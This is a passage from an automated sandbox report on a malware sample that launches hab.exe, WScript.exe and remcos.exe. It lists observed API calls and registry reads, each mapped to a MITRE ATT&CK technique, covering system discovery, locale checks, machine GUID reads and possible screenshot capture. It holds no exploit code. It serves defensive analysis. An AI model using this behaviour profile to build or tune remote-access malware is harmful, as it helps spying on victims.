\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004744-0000010C-2396085\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2408420\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004744-0000010C-2410582\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2421869\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004744-0000010C-2423525\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\\" at 00000000-00004744-0000010C-2428647\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" queries volume information of \"C:\\share\" at 00000000-00004744-0000010C-2429500\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1031888\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00003504-0000010C-1033400\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1044096\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00003504-0000010C-1045583\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1056317\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00003504-0000010C-1057809\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00003504-0000010C-1062515\n \"hab.exe\" queries volume information of \"C:\\share\" at 00000000-00003504-0000010C-1063300\n \"hab.exe\" queries volume information of \"C:\\\" at 00000000-00004488-0000010C-926875", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004744)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003504)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004488)\n \"WScript.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005392)\n \"WScript.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00005392)\n \"remcos.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005488)\n \"remcos.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005656)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005744)\n \"hab.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004300)\n \"remcos.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005944)\n \"WScript.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003016)\n \"WScript.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00003016)\n \"remcos.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002916)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003300390046000400000020000000f0fa12000000000000000001dcfa1200acfa1200606a0000d4f912000401000070ff120095e1e4768ac20600feffffffe063e8761664e876807f1900887f19008800000008fb120000000000807f1900e8fa12005c55e8760000190000000000887f1900f8fa12006755e876887f19000401000010fb1200ae6d757508fb120001000000000000000000000030fb12001087727568fc120000000000ffffff7f50fb12000000000003001f0074fc1200a444947268fc120000000000ffffff7fb74494727ad9737500000000433a3f3032424444 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000002000406307f19000000ce015001ce016b0100500000000070f91200765cef760000ce0100000000980100000000ce010100000004000000000000002802cf01000000000000ce01b8f91200fa64ef763801ce01de64ef763a29fc7600000000000000000000ce01feffffff000000003002cf012000000180f91200729b1a008cfa120095e1e4767ac90600feffffffde64ef7627a1eb760000ce016b010050435ce8761e2afc7608f9ce01000000000000ce0124f912000000ce01b4fa120095e1e4761cfa1200765cef760000190000000000200000000000190001000000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000068d61b00f69beb7678d61b00d0030000eefeeefe2200000058d51b000000190048da1b00000000000000000000000000000000007c00000064d51200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ab1daed5ecd412006d825f757cd61b0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00320034016cbe12003600660078bf120095e1e4767ac90600feffffffde64ef7627a1eb760000190063010050435ce8760a6ffc76d8eb39750000000000001900310065003800370061006100640065003200340036006300610064003800350039002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000062000040000000000000000000000000000000000000000000000000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c07a1e00f69beb76d07a1e0010050000eefeeefe22000000b0791e0000001900e07f1e00000000000000000028b01d00000000007f00000040cf1200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f75d47a1e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d0ae1d00f69beb76e0ae1d00b0010000eefeeefe21000000c8ad1d000000190090b01d00000000000000000000000000000000003800000040cf1200ca5be87621000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f75ec7e1e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000190048861e00de02e87648861e000000190000001900de02e87648861e003cce12000000000000001900edd9ea7620811e00c01e0100eefeeefe400d000000001900e87f1e00f69beb76f87f1e00e81f0100eefeeefe22000000d87e1e0000001900e09f1f0080ce120067e5e57618ac1d00000000007f00000040cf1200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f75fc7f1e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000190058871e00de02e87658871e000000190000001900de02e87658871e003cce12000000000000001900edd9ea7630821e00b01d0100eefeeefe400d00000000190010811e00f69beb7620811e00c01e0100eefeeefe2200000000801e0000001900e09f1f0080ce120067e5e57600001900000000007f00000040cf1200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f7524811e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000190080881e00de02e87680881e000000190000001900de02e87680881e003cce12000000000000001900edd9ea7658831e00881c0100eefeeefe400d00000000190050821e00f69beb7660821e00801d0100eefeeefe2200000040811e0000001900e09f1f0080ce120067e5e576007e1e00000000007f00000040cf1200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f7564821e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000001900c0891e00de02e876c0891e000000190000001900de02e876c0891e003cce12000000000000001900edd9ea7698841e00481b0100eefeeefe400d000000001900d0831e00f69beb76e0831e00001c0100eefeeefe21000000c8821e0000001900e09f1f0080ce120067e5e57600001900000000007f00000040cf1200ca5be87621000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f75e4831e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000001900408b1e00de02e876408b1e000000190000001900de02e876408b1e003cce12000000000000001900edd9ea7618861e00c8190100eefeeefe400d000000001900d0851e00f69beb76e0851e00001a0100eefeeefe22000000c0841e0000001900e09f1f0080ce120067e5e57650831e00000000007f00000040cf1200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f75e4851e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000001900408d1e00de02e876408d1e000000190000001900de02e876408d1e003cce12000000000000001900edd9ea7618881e00c8170100eefeeefe400d00000000190088871e00f69beb7698871e0048180100eefeeefe2200000078861e0000001900e09f1f0080ce120067e5e57670831e00000000007f00000040cf1200ca5be87622000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f759c871e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000001900f88e1e00de02e876f88e1e000000190000001900de02e876f88e1e003cce12000000000000001900edd9ea76d0891e0010160100eefeeefe400d00000000190058891e00f69beb7668891e0078160100eefeeefe2100000050881e0000001900e09f1f0080ce120067e5e57628871e00000000007f00000040cf1200ca5be87621000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f756c891e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000001900c8901e00de02e876c8901e000000190000001900de02e876c8901e003cce12000000000000001900edd9ea76a08b1e0040140100eefeeefe400d000000001900988a1e00f69beb76a88a1e0038150100eefeeefe2300000080891e0000001900e09f1f0080ce120067e5e57668ac1d00000000007f00000040cf1200ca5be87623000000aba3eb767b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cf07aed5c8ce12006d825f75ac8a1e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000028911e0008d81200b3448d69000019000000000000000000000000000000000000000000000000003002000000000000000000000000000049b96cda24267cd5c4dc12005ecb11763002000000000000005d0f7620df12000e5d0f76b8da1200dcaa1376010000000000000072000000ffffffffffffffff40d8120078020000000000002500000040d812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001f11aed598d812006d825f7574931e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000005000000050011900a8dc000068931e0014dded7680941e00f69beb7690941e0008010000eefeeefe12000000f0931e000000190098951e00a0d712006cd71200765cef76000000002300000038d81200ca5be87612000000aba3eb7638d8120062eae576435ce876ba08fc7676000000000000000000190050011900eefeeefe12000000500119007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ab1eaed5ecd712006d825f758c9c1e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008319aed504d112006d825f7524a01e0004010000 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001900edd9ea76c03e1f0020710100eefeeefe600f000000001900b03e1f00f80300007f00000000001900f8361f007f000000c400190050011900262e000080f2070267e5e57600001900 (UID: 00000000-00004744)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000014e11200ca5be87646000000e83e1f00f69beb76f83e1f0040000000eefeeefe07000000b03e1f0000001900383f1f00e03f1f00f69beb76f03f1f00000000000a00000058e11200ca5be87607000000aba3eb7658e1120062eae576435ce876da31fc7620000000000000000000190050011900aba3eb767ce11200500119007800000074011900200000000a00000004001900500119001100000028441f005001190040e11200000000008e00000090e11200feffffff18e11200cf00e976d600e9769a31fc768e0000004700000090e11200483f1f00ece012007f000000 (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call EnumServicesStatusW@ADVAPI32.dll directly followed by \"cmp dword ptr [ebp-08h], edi\" and \"jbe 00411091h\" at 00000000-00004300-46702-435-00410D8B", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"IsWow64Process\" with parameter \"4836\" - (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"IsWow64Process\" with parameter \"4744\" - (UID: 00000000-00004744)\n \"hab.exe\" called \"IsWow64Process\" with parameter \"3504\" - (UID: 00000000-00003504)\n \"hab.exe\" called \"IsWow64Process\" with parameter \"4488\" - (UID: 00000000-00004488)\n \"WScript.exe\" called \"IsWow64Process\" with parameter \"5392\" - (UID: 00000000-00005392)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004744)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003504)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004488)\n \"remcos.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005488)\n \"remcos.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005656)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005744)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004300)\n \"remcos.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005944)\n \"remcos.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002916)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"hab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"WScript.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"remcos.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"remcos.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004744)\n \"hab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004488)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005392)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005656)\n \"hab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004300)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003576)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003476)\n \"hab.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006020)\n \"WScript.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003016)\n \"remcos.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")\n \"hab.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WSCRIPT.EXE\")\n \"hab.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WSCRIPT.EXE\")\n \"WScript.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"WScript.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"remcos.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")\n \"remcos.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\HAB.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"WScript.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003016)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"922812967\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1979780572\"\n \"cx\": \"17\"\n \"cy\": \"92\"}\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"922812967\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1577124389\"\n \"cx\": \"17\"\n \"cy\": \"92\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"352389254\"\n 